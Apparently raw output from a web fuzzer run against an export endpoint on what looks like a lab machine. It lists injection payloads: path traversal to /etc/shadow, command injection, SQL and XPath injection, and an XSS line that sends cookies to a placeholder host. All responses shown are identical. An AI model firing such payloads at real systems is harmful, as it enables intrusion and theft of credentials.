Target: http://10.10.11.170:8080/export.xml?author=FUZZ
Total requests: 468
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00001:  C=200      1 L	       4 W	     38 Ch	  "A"
00014:  C=200      1 L	       4 W	     38 Ch	  "268435455"
00019:  C=200      1 L	       4 W	     38 Ch	  "null"
00013:  C=200      1 L	       4 W	     38 Ch	  "65536"
00007:  C=200      1 L	       4 W	     38 Ch	  "-1"
00018:  C=200      1 L	       4 W	     38 Ch	  "NULL"
00016:  C=200      1 L	       4 W	     38 Ch	  "2147483647"
00003:  C=200      1 L	       4 W	     38 Ch	  "FALSE"
00017:  C=200      1 L	       4 W	     38 Ch	  "0xfffffff"
00015:  C=200      1 L	       4 W	     38 Ch	  "-268435455"
00012:  C=200      1 L	       4 W	     38 Ch	  "-20"
00002:  C=200      1 L	       4 W	     38 Ch	  "TRUE"
00006:  C=200      1 L	       4 W	     38 Ch	  "1"
00010:  C=200      1 L	       4 W	     38 Ch	  "2"
00008:  C=200      1 L	       4 W	     38 Ch	  "1.0"
00004:  C=200      1 L	       4 W	     38 Ch	  "0"
00011:  C=200      1 L	       4 W	     38 Ch	  "-2"
00005:  C=200      1 L	       4 W	     38 Ch	  "00"
00009:  C=200      1 L	       4 W	     38 Ch	  "-1.0"
00036:  C=200      1 L	       4 W	     38 Ch	  ";id;"
00038:  C=200      1 L	       4 W	     38 Ch	  ";netstat -a;"
00037:  C=200      1 L	       4 W	     38 Ch	  ";read;"
00033:  C=200      1 L	       4 W	     38 Ch	  "$NULL"
00032:  C=200      1 L	       4 W	     38 Ch	  "$null"
00024:  C=200      1 L	       4 W	     38 Ch	  "%00"
00025:  C=200      1 L	       4 W	     38 Ch	  "+%00"
00023:  C=200      1 L	       4 W	     38 Ch	  "%0a"
00060:  C=200      1 L	       4 W	     38 Ch	  "/etc/passwd"
00042:  C=200      1 L	       4 W	     38 Ch	  "&quot;;id&quot;"
00059:  C=200      1 L	       4 W	     38 Ch	  "/boot.ini"
00051:  C=200      1 L	       4 W	     38 Ch	  ";dir"
00054:  C=200      1 L	       4 W	     38 Ch	  "?x="
00050:  C=200      1 L	       4 W	     38 Ch	  ";ls -la"
00063:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../etc/hosts%00"
00043:  C=200      1 L	       4 W	     38 Ch	  "id%00"
00068:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../etc/passwd"
00073:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../etc/passwd"
00061:  C=200      1 L	       4 W	     38 Ch	  "/etc/shadow"
00067:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../etc/passwd%00"
00065:  C=200      1 L	       4 W	     38 Ch	  "../../boot.ini"
00070:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../etc/shadow"
00066:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../%2A"
00069:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../etc/shadow%00"
00064:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../etc/hosts"
00074:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../etc/shadow"
00076:  C=200      1 L	       4 W	     38 Ch	  "/./././././././././././etc/shadow"
00090:  C=200      1 L	       4 W	     38 Ch	  "%0a/bin/cat%20/etc/shadow"
00089:  C=200      1 L	       4 W	     38 Ch	  "%0a/bin/cat%20/etc/passwd"
00093:  C=200      1 L	       4 W	     38 Ch	  "%00../../../../../../etc/passwd"
00075:  C=200      1 L	       4 W	     38 Ch	  "/./././././././././././etc/passwd"
00091:  C=200      1 L	       4 W	     38 Ch	  "%00/etc/passwd%00"
00108:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../conf/server.xml"
00097:  C=200      1 L	       4 W	     38 Ch	  "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
00105:  C=200      1 L	       4 W	     38 Ch	  "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini"
00104:  C=200      1 L	       4 W	     38 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini"
00102:  C=200      1 L	       4 W	     38 Ch	  "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00100:  C=200      1 L	       4 W	     38 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
00096:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../../etc/passwd%00.html"
00099:  C=200      1 L	       4 W	     38 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
00103:  C=200      1 L	       4 W	     38 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00"
00095:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../../etc/passwd%00.jpg"
00101:  C=200      1 L	       4 W	     38 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00092:  C=200      1 L	       4 W	     38 Ch	  "%00/etc/shadow%00"
00094:  C=200      1 L	       4 W	     38 Ch	  "%00../../../../../../etc/shadow"
00112:  C=200      1 L	       4 W	     38 Ch	  "C:/boot.ini"
00116:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../boot.ini%00"
00098:  C=200      1 L	       4 W	     38 Ch	  "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
00110:  C=200      1 L	       4 W	     38 Ch	  "C:/inetpub/wwwroot/global.asa"
00142:  C=200      1 L	       4 W	     38 Ch	  "/"
00138:  C=200      1 L	       4 W	     38 Ch	  "#"
00136:  C=200      1 L	       4 W	     38 Ch	  "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;"
00139:  C=200      1 L	       4 W	     38 Ch	  "*"
00141:  C=200      1 L	       4 W	     38 Ch	  ";"
00133:  C=200      1 L	       4 W	     38 Ch	  "%01%02%03%04%0a%0d%0aADSF"
00130:  C=200      1 L	       4 W	     38 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini"
00137:  C=200      1 L	       4 W	     38 Ch	  "%"
00135:  C=200      1 L	       4 W	     38 Ch	  "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;"
00129:  C=200      1 L	       4 W	     38 Ch	  "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini"
00128:  C=200      1 L	       4 W	     38 Ch	  "/.../.../.../.../.../"
00127:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../../boot.ini%00.jpg"
00134:  C=200      1 L	       4 W	     38 Ch	  "/,%ENV,/"
00126:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../../boot.ini%00.html"
00132:  C=200      1 L	       4 W	     38 Ch	  "!@#0%^#0##018387@#0^^**(()"
00131:  C=200      1 L	       4 W	     38 Ch	  "%0d%0aX-Injection-Header:%20AttackValue"
00120:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../../boot.ini"
00118:  C=200      1 L	       4 W	     38 Ch	  "/./././././././././././boot.ini"
00115:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../localstart.asp"
00114:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../localstart.asp%00"
00119:  C=200      1 L	       4 W	     38 Ch	  "/../../../../../../../../../../../boot.ini%00"
00117:  C=200      1 L	       4 W	     38 Ch	  "../../../../../../../../../../../../boot.ini"
00178:  C=200      1 L	       4 W	     38 Ch	  "&#13;&#10;"
00188:  C=200      1 L	       4 W	     38 Ch	  "%3C%3F"
00187:  C=200      1 L	       4 W	     38 Ch	  "%3C"
00148:  C=200      1 L	       4 W	     38 Ch	  "&lt"
00150:  C=200      1 L	       4 W	     38 Ch	  "&LT"
00183:  C=200      1 L	       4 W	     38 Ch	  "/%00/"
00181:  C=200      1 L	       4 W	     38 Ch	  "#xD#xA"
00182:  C=200      1 L	       4 W	     38 Ch	  "#xA#xD"
00177:  C=200      1 L	       4 W	     38 Ch	  "&#10;&#13;"
00179:  C=200      1 L	       4 W	     38 Ch	  "#xD"
00171:  C=200      1 L	       4 W	     38 Ch	  "!@#$%%^#$%#$@#$%$$@#$%^^**(()"
00172:  C=200      1 L	       4 W	     38 Ch	  "%01%02%03%04%0a%0d%0aADSF"
00185:  C=200      1 L	       4 W	     38 Ch	  "%00"
00180:  C=200      1 L	       4 W	     38 Ch	  "#xA"
00184:  C=200      1 L	       4 W	     38 Ch	  "%00/"
00176:  C=200      1 L	       4 W	     38 Ch	  "&#13;"
00175:  C=200      1 L	       4 W	     38 Ch	  "&#10;"
00170:  C=200      1 L	       4 W	     38 Ch	  "!'"
00169:  C=200      1 L	       4 W	     38 Ch	  "#'"
00164:  C=200      1 L	       4 W	     38 Ch	  "@'"
00165:  C=200      1 L	       4 W	     38 Ch	  "(')"
00163:  C=200      1 L	       4 W	     38 Ch	  "/'"
00168:  C=200      1 L	       4 W	     38 Ch	  "*'"
00158:  C=200      1 L	       4 W	     38 Ch	  "-"
00159:  C=200      1 L	       4 W	     38 Ch	  "--"
00149:  C=200      1 L	       4 W	     38 Ch	  "&lt;"
00189:  C=200      1 L	       4 W	     38 Ch	  "%60"
00191:  C=200      1 L	       4 W	     38 Ch	  "%5C/"
00151:  C=200      1 L	       4 W	     38 Ch	  "&LT;"
00209:  C=200      1 L	       4 W	     38 Ch	  "..%255c"
00203:  C=200      1 L	       4 W	     38 Ch	  "..%u2215"
00207:  C=200      1 L	       4 W	     38 Ch	  "..%5c"
00199:  C=200      1 L	       4 W	     38 Ch	  "%250a"
00208:  C=200      1 L	       4 W	     38 Ch	  "..%%35c"
00195:  C=200      1 L	       4 W	     38 Ch	  "%2A"
00205:  C=200      1 L	       4 W	     38 Ch	  "..%bg%qf"
00200:  C=200      1 L	       4 W	     38 Ch	  "%2500"
00201:  C=200      1 L	       4 W	     38 Ch	  "../"
00202:  C=200      1 L	       4 W	     38 Ch	  "%2e%2e%2f"
00204:  C=200      1 L	       4 W	     38 Ch	  "..%c0%af"
00194:  C=200      1 L	       4 W	     38 Ch	  "/%2A"
00196:  C=200      1 L	       4 W	     38 Ch	  "%2C"
00190:  C=200      1 L	       4 W	     38 Ch	  "%5C"
00192:  C=200      1 L	       4 W	     38 Ch	  "%7C"
00193:  C=200      1 L	       4 W	     38 Ch	  "%00"
00212:  C=200      1 L	       4 W	     38 Ch	  "..%u2216"
00216:  C=200      1 L	       4 W	     38 Ch	  "&#00060"
00210:  C=200      1 L	       4 W	     38 Ch	  "..%%35%63"
00197:  C=200      1 L	       4 W	     38 Ch	  "%20"
00240:  C=200      1 L	       4 W	     38 Ch	  "&#X0003c"
00248:  C=200      1 L	       4 W	     38 Ch	  "&#X000003c;"
00247:  C=200      1 L	       4 W	     38 Ch	  "&#X00003c;"
00246:  C=200      1 L	       4 W	     38 Ch	  "&#X0003c;"
00245:  C=200      1 L	       4 W	     38 Ch	  "&#X003c;"
00244:  C=200      1 L	       4 W	     38 Ch	  "&#X03c;"
00243:  C=200      1 L	       4 W	     38 Ch	  "&#X3c;"
00242:  C=200      1 L	       4 W	     38 Ch	  "&#X000003c"
00224:  C=200      1 L	       4 W	     38 Ch	  "&#0000060;"
00239:  C=200      1 L	       4 W	     38 Ch	  "&#X003c"
00241:  C=200      1 L	       4 W	     38 Ch	  "&#X00003c"
00235:  C=200      1 L	       4 W	     38 Ch	  "&#x00003c;"
00238:  C=200      1 L	       4 W	     38 Ch	  "&#X03c"
00237:  C=200      1 L	       4 W	     38 Ch	  "&#X3c"
00236:  C=200      1 L	       4 W	     38 Ch	  "&#x000003c;"
00234:  C=200      1 L	       4 W	     38 Ch	  "&#x0003c;"
00232:  C=200      1 L	       4 W	     38 Ch	  "&#x03c;"
00233:  C=200      1 L	       4 W	     38 Ch	  "&#x003c;"
00231:  C=200      1 L	       4 W	     38 Ch	  "&#x3c;"
00230:  C=200      1 L	       4 W	     38 Ch	  "&#x000003c"
00229:  C=200      1 L	       4 W	     38 Ch	  "&#x00003c"
00228:  C=200      1 L	       4 W	     38 Ch	  "&#x0003c"
00225:  C=200      1 L	       4 W	     38 Ch	  "&#x3c"
00227:  C=200      1 L	       4 W	     38 Ch	  "&#x003c"
00226:  C=200      1 L	       4 W	     38 Ch	  "&#x03c"
00223:  C=200      1 L	       4 W	     38 Ch	  "&#000060;"
00222:  C=200      1 L	       4 W	     38 Ch	  "&#00060;"
00221:  C=200      1 L	       4 W	     38 Ch	  "&#0060;"
00220:  C=200      1 L	       4 W	     38 Ch	  "&#060;"
00219:  C=200      1 L	       4 W	     38 Ch	  "&#60;"
00218:  C=200      1 L	       4 W	     38 Ch	  "&#0000060"
00215:  C=200      1 L	       4 W	     38 Ch	  "&#0060"
00211:  C=200      1 L	       4 W	     38 Ch	  "..%25%35%63"
00213:  C=200      1 L	       4 W	     38 Ch	  "&#60"
00217:  C=200      1 L	       4 W	     38 Ch	  "&#000060"
00214:  C=200      1 L	       4 W	     38 Ch	  "&#060"
00249:  C=200      1 L	       4 W	     38 Ch	  "&#x3C"
00251:  C=200      1 L	       4 W	     38 Ch	  "&#x003C"
00255:  C=200      1 L	       4 W	     38 Ch	  "&#x3C;"
00268:  C=200      1 L	       4 W	     38 Ch	  "&#X03C;"
00263:  C=200      1 L	       4 W	     38 Ch	  "&#X003C"
00265:  C=200      1 L	       4 W	     38 Ch	  "&#X00003C"
00267:  C=200      1 L	       4 W	     38 Ch	  "&#X3C;"
00266:  C=200      1 L	       4 W	     38 Ch	  "&#X000003C"
00262:  C=200      1 L	       4 W	     38 Ch	  "&#X03C"
00260:  C=200      1 L	       4 W	     38 Ch	  "&#x000003C;"
00259:  C=200      1 L	       4 W	     38 Ch	  "&#x00003C;"
00261:  C=200      1 L	       4 W	     38 Ch	  "&#X3C"
00264:  C=200      1 L	       4 W	     38 Ch	  "&#X0003C"
00258:  C=200      1 L	       4 W	     38 Ch	  "&#x0003C;"
00256:  C=200      1 L	       4 W	     38 Ch	  "&#x03C;"
00257:  C=200      1 L	       4 W	     38 Ch	  "&#x003C;"
00253:  C=200      1 L	       4 W	     38 Ch	  "&#x00003C"
00254:  C=200      1 L	       4 W	     38 Ch	  "&#x000003C"
00250:  C=200      1 L	       4 W	     38 Ch	  "&#x03C"
00252:  C=200      1 L	       4 W	     38 Ch	  "&#x0003C"
00269:  C=200      1 L	       4 W	     38 Ch	  "&#X003C;"
00271:  C=200      1 L	       4 W	     38 Ch	  "&#X00003C;"
00299:  C=200      1 L	       4 W	     38 Ch	  "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
00296:  C=200      1 L	       4 W	     38 Ch	  "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
00297:  C=200      1 L	       4 W	     38 Ch	  "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
00286:  C=200      1 L	       4 W	     38 Ch	  "#&apos;"
00279:  C=200      1 L	       4 W	     38 Ch	  "/&apos;"
00285:  C=200      1 L	       4 W	     38 Ch	  "*&apos;"
00282:  C=200      1 L	       4 W	     38 Ch	  "@&apos;"
00278:  C=200      1 L	       4 W	     38 Ch	  "&apos;"
00277:  C=200      1 L	       4 W	     38 Ch	  "something%00html"
00270:  C=200      1 L	       4 W	     38 Ch	  "&#X0003C;"
00272:  C=200      1 L	       4 W	     38 Ch	  "&#X000003C;"
00333:  C=200      1 L	       4 W	     38 Ch	  "' --"
00338:  C=200      1 L	       4 W	     38 Ch	  "= --"
00335:  C=200      1 L	       4 W	     38 Ch	  "' ;"
00332:  C=200      1 L	       4 W	     38 Ch	  "--"
00334:  C=200      1 L	       4 W	     38 Ch	  "--';"
00331:  C=200      1 L	       4 W	     38 Ch	  "-"
00337:  C=200      1 L	       4 W	     38 Ch	  "= ;"
00336:  C=200      1 L	       4 W	     38 Ch	  "= '"
00328:  C=200      1 L	       4 W	     38 Ch	  "'"
00330:  C=200      1 L	       4 W	     38 Ch	  "#"
00322:  C=200      1 L	       4 W	     38 Ch	  "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
00346:  C=200      1 L	       4 W	     38 Ch	  "admin'--"
00327:  C=200      1 L	       4 W	     38 Ch	  "http://10.10.11.170:8080/export.xml?author="
00324:  C=200      1 L	       4 W	     38 Ch	  "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
00388:  C=200      1 L	       4 W	     38 Ch	  "limit"
00387:  C=200      1 L	       4 W	     38 Ch	  "procedure"
00385:  C=200      1 L	       4 W	     38 Ch	  "as"
00384:  C=200      1 L	       4 W	     38 Ch	  "insert"
00370:  C=200      1 L	       4 W	     38 Ch	  "') or ('a'='a"
00389:  C=200      1 L	       4 W	     38 Ch	  "order by"
00380:  C=200      1 L	       4 W	     38 Ch	  ",@variable"
00386:  C=200      1 L	       4 W	     38 Ch	  "or"
00379:  C=200      1 L	       4 W	     38 Ch	  "@variable"
00378:  C=200      1 L	       4 W	     38 Ch	  "'hi' or 'x'='x';"
00382:  C=200      1 L	       4 W	     38 Ch	  "PRINT @@variable"
00383:  C=200      1 L	       4 W	     38 Ch	  "select"
00381:  C=200      1 L	       4 W	     38 Ch	  "PRINT"
00376:  C=200      1 L	       4 W	     38 Ch	  "hi') or ('a'='a"
00375:  C=200      1 L	       4 W	     38 Ch	  "hi' or 'a'='a"
00374:  C=200      1 L	       4 W	     38 Ch	  "hi' or 1=1 --"
00365:  C=200      1 L	       4 W	     38 Ch	  "or%201=1 --"
00364:  C=200      1 L	       4 W	     38 Ch	  "or%201=1"
00366:  C=200      1 L	       4 W	     38 Ch	  "' or 1=1 or ''='"
00363:  C=200      1 L	       4 W	     38 Ch	  "or 1=1--"
00359:  C=200      1 L	       4 W	     38 Ch	  "' or 1=1--"
00358:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 #"
00368:  C=200      1 L	       4 W	     38 Ch	  "' or a=a--"
00355:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 --"
00361:  C=200      1 L	       4 W	     38 Ch	  "' or '1'='1'--"
00351:  C=200      1 L	       4 W	     38 Ch	  "') or ('x'='x"
00352:  C=200      1 L	       4 W	     38 Ch	  "0 or 1=1"
00353:  C=200      1 L	       4 W	     38 Ch	  "' or 0=0 --"
00348:  C=200      1 L	       4 W	     38 Ch	  "' or ''='"
00356:  C=200      1 L	       4 W	     38 Ch	  "' or 0=0 #"
00345:  C=200      1 L	       4 W	     38 Ch	  "'or select *"
00349:  C=200      1 L	       4 W	     38 Ch	  "' or 'x'='x"
00392:  C=200      1 L	       4 W	     38 Ch	  "delete"
00396:  C=200      1 L	       4 W	     38 Ch	  "truncate"
00403:  C=200      1 L	       4 W	     38 Ch	  "' or userid like '%"
00405:  C=200      1 L	       4 W	     38 Ch	  "' or user like '%"
00390:  C=200      1 L	       4 W	     38 Ch	  "asc"
00404:  C=200      1 L	       4 W	     38 Ch	  "' or uid like '%"
00400:  C=200      1 L	       4 W	     38 Ch	  "bfilename"
00398:  C=200      1 L	       4 W	     38 Ch	  "like"
00395:  C=200      1 L	       4 W	     38 Ch	  "having"
00394:  C=200      1 L	       4 W	     38 Ch	  "distinct"
00402:  C=200      1 L	       4 W	     38 Ch	  "' or uname like '%"
00391:  C=200      1 L	       4 W	     38 Ch	  "desc"
00393:  C=200      1 L	       4 W	     38 Ch	  "update"
00401:  C=200      1 L	       4 W	     38 Ch	  "' or username like '%"
00406:  C=200      1 L	       4 W	     38 Ch	  "exec xp"
00408:  C=200      1 L	       4 W	     38 Ch	  "'; exec master..xp_cmdshell"
00399:  C=200      1 L	       4 W	     38 Ch	  "handler"
00397:  C=200      1 L	       4 W	     38 Ch	  "replace"
00420:  C=200      1 L	       4 W	     38 Ch	  "tz_offset"
00424:  C=200      1 L	       4 W	     38 Ch	  "%20$(sleep%2050)"
00423:  C=200      1 L	       4 W	     38 Ch	  "%27%20or%201=1"
00419:  C=200      1 L	       4 W	     38 Ch	  "to_timestamp_tz"
00422:  C=200      1 L	       4 W	     38 Ch	  "'%20or%201=1"
00418:  C=200      1 L	       4 W	     38 Ch	  "1;SELECT%20*"
00421:  C=200      1 L	       4 W	     38 Ch	  "&lt;&gt;&quot;'%;)(&amp;+"
00416:  C=200      1 L	       4 W	     38 Ch	  "' (select top 1"
00414:  C=200      1 L	       4 W	     38 Ch	  "' UNION ALL SELECT"
00411:  C=200      1 L	       4 W	     38 Ch	  "--sp_password"
00413:  C=200      1 L	       4 W	     38 Ch	  "' UNION SELECT"
00407:  C=200      1 L	       4 W	     38 Ch	  "exec sp"
00410:  C=200      1 L	       4 W	     38 Ch	  "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00409:  C=200      1 L	       4 W	     38 Ch	  "'; exec xp_regread"
00427:  C=200      1 L	       4 W	     38 Ch	  "&apos;%20OR"
00431:  C=200      1 L	       4 W	     38 Ch	  "%7C"
00415:  C=200      1 L	       4 W	     38 Ch	  "' or (EXISTS)"
00438:  C=200      1 L	       4 W	     38 Ch	  "("
00437:  C=200      1 L	       4 W	     38 Ch	  "%2A%28%7C%28objectclass%3D%2A%29%29"
00435:  C=200      1 L	       4 W	     38 Ch	  "%2A%28%7C%28mail%3D%2A%29%29"
00425:  C=200      1 L	       4 W	     38 Ch	  "%20'sleep%2050'"
00433:  C=200      1 L	       4 W	     38 Ch	  "%2A%7C"
00426:  C=200      1 L	       4 W	     38 Ch	  "char%4039%41%2b%40SELECT"
00429:  C=200      1 L	       4 W	     38 Ch	  "(sqlattempt2)"
00428:  C=200      1 L	       4 W	     38 Ch	  "'sqlattempt1"
00445:  C=200      1 L	       4 W	     38 Ch	  "%21"
00441:  C=200      1 L	       4 W	     38 Ch	  "%29"
00449:  C=200      1 L	       4 W	     38 Ch	  "/"
00447:  C=200      1 L	       4 W	     38 Ch	  "' or ''='"
00440:  C=200      1 L	       4 W	     38 Ch	  ")"
00442:  C=200      1 L	       4 W	     38 Ch	  "&"
00451:  C=200      1 L	       4 W	     38 Ch	  "//*"
00443:  C=200      1 L	       4 W	     38 Ch	  "%26"
00446:  C=200      1 L	       4 W	     38 Ch	  "' or 1=1 or ''='"
00439:  C=200      1 L	       4 W	     38 Ch	  "%28"
00450:  C=200      1 L	       4 W	     38 Ch	  "//"
00448:  C=200      1 L	       4 W	     38 Ch	  "x' or 1=1 or 'x'='y"
00453:  C=200      1 L	       4 W	     38 Ch	  "@*"
00444:  C=200      1 L	       4 W	     38 Ch	  "!"
00455:  C=200      1 L	       4 W	     38 Ch	  "x' or name()='username' or 'x'='y"
00452:  C=200      1 L	       4 W	     38 Ch	  "*/*"
00454:  C=200      1 L	       4 W	     38 Ch	  "count(/child::node())"

Total time: 0
Processed Requests: 468
Filtered Requests: 154
Requests/sec.: 0
